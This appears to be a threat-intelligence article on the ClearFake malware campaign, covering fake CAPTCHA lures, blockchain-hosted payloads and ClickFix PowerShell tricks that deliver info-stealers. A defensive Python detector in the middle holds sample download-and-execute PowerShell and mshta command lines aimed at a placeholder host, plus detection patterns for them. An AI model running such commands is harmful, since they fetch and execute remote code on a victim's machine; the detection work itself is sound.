ClearFake Attack Campaign

The cyber threat actors behind the ClearFake campaign have been using fake reCAPTCHA and Cloudflare Turnstile verifications to trick unsuspecting users into downloading malware. These deceptive techniques are employed to distribute information-stealing malware such as the Lumma Stealer and the Vidar Stealer.

Fake Browser Updates as a Malware Trap

First identified in July 2023, ClearFake is a malicious campaign that spreads through compromised WordPress sites, using fake web browser update prompts to lure victims. This method has been a favored technique for cybercriminals looking to deploy malware efficiently.

Leveraging EtherHiding for Stealth and Persistence

A key aspect of ClearFake's infection chain is EtherHiding, a technique that allows attackers to fetch the next-stage payload using Binance's Smart Chain (BSC) contracts. This approach enhances the resilience of the attack by leveraging decentralized blockchain technology, making detection and takedown efforts more challenging.

The Emergence of ClickFix: A Social Engineering Ploy

By May 2024, ClearFake had incorporated ClickFix, a social engineering trick designed to deceive users into executing malicious PowerShell code under the false pretense of fixing a non-existent technical issue. This technique helps attackers gain further control over the victim's system.

Advanced Web3 Capabilities in ClearFake’s Latest Variant

The latest iterations of the ClearFake campaign continue to employ EtherHiding and ClickFix, but with notable advancements. These updates include:

  • Greater interaction with Binance Smart Chain, using smart contract Application Binary Interfaces (ABIs).
  • Enhanced fingerprinting of victims' systems, loading multiple JavaScript files and other resources.
  • Encrypted ClickFix HTML code to evade security analysis.

A Multi-Stage Attack with Encrypted Payloads

Once a victim visits a compromised website, the attack unfolds in several stages:

  • Retrieval of JavaScript from Binance Smart Chain to gather system information.
  • Fetching an encrypted ClickFix script from Cloudflare Pages.
  • Execution of a malicious PowerShell command, leading to malware deployment.

If the victim proceeds with the malicious action, the Emmenhtal Loader (aka PEAKLIGHT) is executed, which ultimately installs Lumma Stealer on the system.
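The ClickFix stage of this chain (the user pastes a PowerShell command into a Run dialog, as described in the ClickFix sections above) leaves a distinctive process-creation trace: a script host launched from the interactive shell with a download-and-execute command line. As an added example that is not part of this article, the Python below scores Sysmon-style Event ID 1 records for that shape; the event records, command lines and placeholder hosts are constructed for illustration, and the field names follow Sysmon's process-creation event.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry);
# hosts are placeholders. Field names follow Sysmon Event ID 1.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://PLACEHOLDER.invalid/check)"'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://PLACEHOLDER.invalid/verify"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -File C:\\ops\\backup.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -NoExit -Command Get-Process"},
]

# (indicator name, regex over the command line)
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)),
    ("download_cradle", re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|start-bitstransfer)\b", re.I)),
    ("inline_eval", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("encoded_command", re.compile(r"-e(?:ncodedcommand|nc|c)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("url_argument", re.compile(r"https?://\S+", re.I)),
]
# Any of these means remote content is being pulled in; the rest add confidence.
REMOTE_FETCH = {"download_cradle", "encoded_command", "url_argument"}
INTERACTIVE_PARENTS = {"explorer.exe"}   # Win+R Run dialog: the user pasted it
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe"}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def clickfix_indicators(event):
    """Indicator names that fire for one event, in INDICATORS order.
    Only script hosts spawned from an interactive parent are examined."""
    if basename(event["Image"]) not in SCRIPT_HOSTS:
        return []
    if basename(event["ParentImage"]) not in INTERACTIVE_PARENTS:
        return []
    return [name for name, rx in INDICATORS if rx.search(event["CommandLine"])]

def find_clickfix_candidates(events):
    """(image, indicators) for events that fetch remote content; a plain
    interactive 'powershell Get-Process' is not flagged."""
    hits = []
    for ev in events:
        names = clickfix_indicators(ev)
        if REMOTE_FETCH & set(names):
            hits.append((basename(ev["Image"]), names))
    return hits

if __name__ == "__main__":
    for image, names in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(names)}")
```

Parent-process and command-line heuristics of this kind belong in an EDR or SIEM rule; the explorer.exe parent is what separates a pasted ClickFix command from scripted automation launched by cmd.exe or a scheduler.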

Evolving Tactics: A Large-Scale Threat

By January 2025, security researchers observed new ClearFake attack chains utilizing PowerShell loaders to install Vidar Stealer. As of last month, at least 9,300 websites have been compromised.

Attackers continuously update the ClearFake framework, modifying its lures, scripts, and payloads daily. The malware now stores multiple key elements within Binance Smart Chain, including:

  • JavaScript code
  • AES encryption keys
  • URLs hosting malicious lure files
  • ClickFix PowerShell commands

Mass Infections and Widespread Exposure

The scale of ClearFake infections is significant, affecting a vast number of users worldwide. In July 2024, approximately 200,000 unique users were potentially exposed to ClearFake lures that prompted them to download malware.

ClickFix Compromises Auto Dealership Websites

A significant attack vector for ClickFix has been auto dealership websites. Over 100 dealership sites were compromised, with the SectopRAT malware being delivered via ClickFix lures.

However, the dealerships' own websites were not directly infected. Instead, the compromise occurred through a third-party video service that unknowingly hosted the injected malicious JavaScript. This incident appears to be a supply chain attack, highlighting the risks posed by vulnerabilities in third-party services. The malicious script has since been removed from the infected site.

Final Thoughts: A Persistent and Expanding Threat

The ClearFake campaign continues to evolve, leveraging advanced blockchain-based techniques, social engineering, and multi-stage infection chains. The scale of its impact, with thousands of compromised sites and hundreds of thousands of potential victims, underscores the urgent need for robust cybersecurity measures to defend against such sophisticated malware threats.